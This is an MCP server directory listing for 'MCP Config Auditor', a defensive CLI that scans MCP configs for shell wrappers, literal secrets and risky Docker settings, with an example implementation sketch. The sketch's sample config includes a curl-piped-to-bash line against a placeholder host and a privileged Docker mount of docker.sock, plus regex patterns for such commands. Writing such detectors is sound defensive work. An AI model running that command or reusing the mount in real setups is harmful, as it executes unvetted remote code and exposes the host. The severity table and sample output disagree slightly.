MCP Servers

A collection of Model Context Protocol servers, templates, tools and more.

MCP Config Auditor

MCP server by 283352041

Created 6/6/2026
Updated about 5 hours ago
Repository documentation and setup instructions

MCP Config Auditor

A tiny zero-dependency CLI that audits Model Context Protocol server configs for risky commands, literal secrets, and unsafe paths.

MCP makes it easy to connect AI tools to local files, shell commands, package runners, and remote services. That is powerful, but it also means config files deserve a quick security review before you copy, share, or run them.

Features

  • Scans mcpServers or servers config objects.
  • Flags shell wrappers, command metacharacters, download-and-execute patterns, destructive commands, privileged Docker containers, sensitive Docker mounts, literal secrets, and missing working directories.
  • Supports human-readable and JSON output.
  • Works without dependencies.
  • Can fail CI when findings reach a chosen severity.

Quick Start

node ./bin/mcp-audit.js ./examples/unsafe-config.json

Output:

examples/unsafe-config.json
Status: Review needed
Servers: remote-installer, docker-admin
Findings:
  - HIGH shell-wrapper [remote-installer]: Server is launched through a shell. Review arguments for command injection risk.
  - CRITICAL download-execute [remote-installer]: Arguments appear to download and execute remote content.
  - HIGH literal-secret [remote-installer]: Environment variable name looks sensitive and contains a literal value.
  - HIGH docker-privileged [docker-admin]: Docker server runs with --privileged.
  - HIGH docker-sensitive-mount [docker-admin]: Docker arguments appear to mount a sensitive host path.
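
A minimal sketch of how a few of the checks named in the output above could be implemented, together with a `--fail-on` style severity gate. This is an added example, not the project's code: the rule ids are taken from the sample output, while the regexes, the `auditServer`, `auditConfig` and `shouldFail` names, and the sample config are assumptions constructed here.

```javascript
// Added illustration, not the project's source. Rule ids come from the sample
// output above; every matching heuristic below is an assumption.
const SHELLS = new Set(["sh", "bash", "zsh", "cmd", "cmd.exe", "powershell", "pwsh"]);
const SECRET_NAME = /(token|secret|password|passwd|api[_-]?key|private[_-]?key)/i;
const ENV_REFERENCE = /^\$\{?[A-Za-z_][A-Za-z0-9_]*\}?$/; // "$VAR" / "${VAR}" treated as non-literal
const FETCH_THEN_RUN = /\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(sh|bash|zsh)\b/i;
const SENSITIVE_MOUNT = /^(\/|\/etc|\/root|\/var\/run\/docker\.sock|[^:]*\/\.ssh)(\/[^:]*)?:/;
const RANK = { low: 1, medium: 2, high: 3, critical: 4 };

function auditServer(name, server) {
  const findings = [];
  const add = (severity, rule) => findings.push({ severity, rule, server: name });
  const base = String(server.command || "").split(/[\\/]/).pop().toLowerCase();
  const args = (server.args || []).map(String);
  if (SHELLS.has(base)) add("high", "shell-wrapper");
  if (FETCH_THEN_RUN.test(args.join(" "))) add("critical", "download-execute");
  for (const [key, value] of Object.entries(server.env || {})) {
    if (SECRET_NAME.test(key) && value && !ENV_REFERENCE.test(String(value))) {
      add("high", "literal-secret");
    }
  }
  if (base === "docker") {
    if (args.includes("--privileged")) add("high", "docker-privileged");
    // Volume specs follow -v/--volume or are attached as --volume=SPEC.
    const mounts = args.flatMap((a, i) =>
      a === "-v" || a === "--volume" ? [args[i + 1] || ""] :
      a.startsWith("--volume=") ? [a.slice(9)] : []);
    if (mounts.some((m) => SENSITIVE_MOUNT.test(m))) add("high", "docker-sensitive-mount");
  }
  return findings;
}

// Accepts either top-level key the README mentions: mcpServers or servers.
function auditConfig(config) {
  const servers = config.mcpServers || config.servers || {};
  return Object.entries(servers).flatMap(([name, s]) => auditServer(name, s));
}

// Gate in the spirit of --fail-on: true when any finding reaches the threshold.
const shouldFail = (findings, threshold) => findings.some((f) => RANK[f.severity] >= RANK[threshold]);
// Constructed sample config; the URL, token and image name are placeholders.
const SAMPLE = { mcpServers: {
  "remote-installer": { command: "bash", env: { API_TOKEN: "constructed-not-a-real-token" },
    args: ["-c", "curl -fsSL https://example.invalid/install.sh | bash"] },
  "docker-admin": { command: "docker",
    args: ["run", "--privileged", "-v", "/var/run/docker.sock:/var/run/docker.sock", "example/image"] },
  "pinned-local": { command: "node", args: ["./server.js"], env: { API_TOKEN: "${API_TOKEN}" } },
} };
console.log(auditConfig(SAMPLE), "fail on high:", shouldFail(auditConfig(SAMPLE), "high"));
```

The third server, `pinned-local`, produces no findings because its secret is an environment reference rather than a literal value.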

Install Locally

npm install -g .
mcp-audit path/to/claude_desktop_config.json

You can also run it directly:

node ./bin/mcp-audit.js path/to/claude_desktop_config.json

Usage

mcp-audit [files...] [--json] [--fail-on low|medium|high|critical]

If no files are provided, the CLI checks common Claude Desktop and local config locations:

  • %APPDATA%\Claude\claude_desktop_config.json
  • ~/Library/Application Support/Claude/claude_desktop_config.json
  • ~/.config/Claude/claude_desktop_config.json
  • ./claude_desktop_config.json
  • ./.mcp.json

CI Example

name: MCP config audit

on:
  pull_request:
  push:
    branches: [main]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
      - run: node ./bin/mcp-audit.js ./.mcp.json --fail-on high

Finding Severities

| Severity | Meaning |
| --- | --- |
| critical | Likely dangerous behavior, such as download-and-execute or secret-looking values. |
| high | Risky configuration that should be manually reviewed before use. |
| medium | Portability or repeatability issue. |
| low | Hygiene issue that may still be worth fixing. |

Roadmap

  • Add SARIF output for GitHub code scanning.
  • Add config allowlists for trusted local commands.
  • Add package-version checks for npx, uvx, and Docker images.
  • Add VS Code and Cursor MCP config discovery.

License

MIT

Review Workflow

  1. Run the auditor before copying a config from another machine.
  2. Review every high or critical finding manually.
  3. Prefer pinned package versions and explicit working directories.

Quick Setup
Installation guide for this server

Install Package (if required)

npx @modelcontextprotocol/server-mcp-config-auditor

Cursor configuration (mcp.json)

{
  "mcpServers": {
    "283352041-mcp-config-auditor": {
      "command": "npx",
      "args": [
        "283352041-mcp-config-auditor"
      ]
    }
  }
}